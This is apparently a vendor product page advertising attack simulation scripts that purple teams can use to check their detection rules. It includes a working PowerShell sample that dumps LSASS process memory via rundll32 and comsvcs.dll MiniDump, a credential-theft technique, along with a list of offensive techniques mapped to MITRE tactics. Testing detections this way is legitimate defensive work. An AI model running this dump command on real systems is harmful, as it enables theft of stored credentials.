Published: March 2026 | Last reviewed: March 22, 2026

// attack_simulations

Validate Your Defenses Before Adversaries Do

Threadlinqs ships 300+ attack simulation scenarios tied to real-world threats. Each simulation is a runnable script in PowerShell, Bash, or Python that replicates the exact techniques used by threat actors, so your team can validate detection rules and security controls in controlled environments.

300+

Simulations

Script Languages

249+

Threats Linked

465

MITRE Techniques

What Are Attack Simulations?

Attack simulations are controlled, reproducible scripts that emulate the exact behavior of real-world threat actors. Instead of guessing whether your EDR catches a particular technique, you run the simulation in a lab and watch what happens. If your detections fire, your controls work. If they do not, you know exactly what to fix.

Every simulation on Threadlinqs is linked to a specific threat report, so you can trace the simulation back to the original campaign, see the IOCs involved, and cross-reference the detection rules that should trigger.

Three Script Formats

Simulations are written for the environments where threats actually execute. Pick the format that matches your lab setup.

PowerShell

Windows-native simulation scripts targeting Active Directory, registry manipulation, WMI abuse, scheduled tasks, and credential harvesting techniques.

Windows Server / Workstation labs

Bash

Linux simulation scripts for cron persistence, SSH lateral movement, container escape, kernel exploitation, and log tampering scenarios.

Linux / macOS / container labs

Python

Cross-platform scripts for network-level simulations, C2 beacon emulation, DNS tunneling, data exfiltration, and API abuse scenarios.

Cross-platform / network labs

Sample Simulation

Below is a real simulation from the platform that emulates LSASS credential dumping via MiniDump, mapped to MITRE ATT&CK T1003.001 (OS Credential Dumping: LSASS Memory).

POWERSHELL# Simulation: LSASS Credential Dump via MiniDump API
# MITRE: T1003.001 (OS Credential Dumping: LSASS Memory)
# Threat: Mimikatz / Credential Access Campaign
# Run in elevated lab environment only

$lsass = Get-Process lsass
$dumpPath = "$env:TEMP\lsass_sim_$(Get-Date -f yyyyMMdd).dmp"

# Use comsvcs.dll MiniDump (LOLBin technique)
rundll32.exe C:\Windows\System32\comsvcs.dll, `
  MiniDump $lsass.Id $dumpPath full

if (Test-Path $dumpPath) {
    Write-Host "[+] Dump created: $dumpPath"
    Write-Host "[+] Expected detections:"
    Write-Host "    - Sysmon EventCode 10 (ProcessAccess)"
    Write-Host "    - comsvcs.dll MiniDump invocation"
    Remove-Item $dumpPath -Force
} else {
    Write-Host "[-] Dump blocked - controls working"
}

After running the simulation, check whether your Sysmon EventCode 10 and comsvcs.dll detection rules fired. The corresponding SPL/KQL/Sigma rules are available on the detection engineering page.

Purple Team Workflow

Simulations are designed for a closed-loop purple team workflow where red team execution is immediately validated against blue team detections.

Threat-Linked

Every simulation ties back to a specific threat report with IOCs, timeline, actor attribution, and detection rules.

MITRE Mapped

Simulations are tagged with MITRE ATT&CK technique IDs so you can validate coverage per technique.

Detection Pairing

Each simulation has corresponding detection rules in SPL, KQL, and Sigma that should fire on execution.

Safe by Default

Simulations emulate behavior without deploying actual malware. Cleanup steps are included in every script.

Copy-Paste Ready

One-click copy from the platform UI. Scripts are standalone with no external dependencies.

Severity Graded

Simulations inherit the severity rating of their parent threat, helping prioritize which controls to validate first.

Coverage by Tactic

Simulations span all phases of the MITRE ATT&CK kill chain, with depth in the techniques most exploited by active threat actors.

Initial Access -- Phishing payload delivery, exploit chains, drive-by downloads
Execution -- PowerShell abuse, WMI execution, scripting engines, LOLBins
Persistence -- Registry run keys, scheduled tasks, DLL hijacking, services
Privilege Escalation -- Token manipulation, UAC bypass, kernel exploits
Credential Access -- LSASS dumping, Kerberoasting, keylogging, SAM extraction
Lateral Movement -- PsExec, WinRM, SSH tunneling, RDP hijacking
Exfiltration -- DNS tunneling, HTTPS staging, cloud storage abuse

// author

Threadlinqs Intel Team

Security Engineer at Threadlinqs Intelligence. Researching active threats, building detection rules, and mapping adversary tradecraft across SPL, KQL, and Sigma.

medium.com/@hatim.bakkali10

Validate your security controls against 300+ real-world attack scenarios.

[ explore_simulations ] view pricing

What Are Attack Simulations?

Three Script Formats

Sample Simulation

Purple Team Workflow

Coverage by Tactic

Explore the Platform